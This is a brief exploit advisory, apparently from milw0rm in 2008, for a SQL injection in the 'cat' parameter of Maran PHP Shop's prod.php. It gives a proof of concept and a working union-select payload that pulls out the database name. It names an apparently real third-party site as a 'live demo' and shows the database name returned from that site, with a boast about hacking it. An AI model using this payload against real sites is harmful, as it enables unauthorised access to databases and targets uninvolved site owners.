# Maran PHP Shop (prod.php cat) SQL Injection Vulnerability # url: http://www.maran.pamil-visions.com/maranshop.php # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. PoC: /prod.php?cat=7['SQL] ExP: /prod.php?cat=7+and+1=2++union+all+select+database()-- live demo: http://www.heimanis.lv/prod.php?cat=7+and+1=2++union+all+select+database()-- output:~$ latvello_heimanis Hack0wn :D # milw0rm.com [2008-11-02]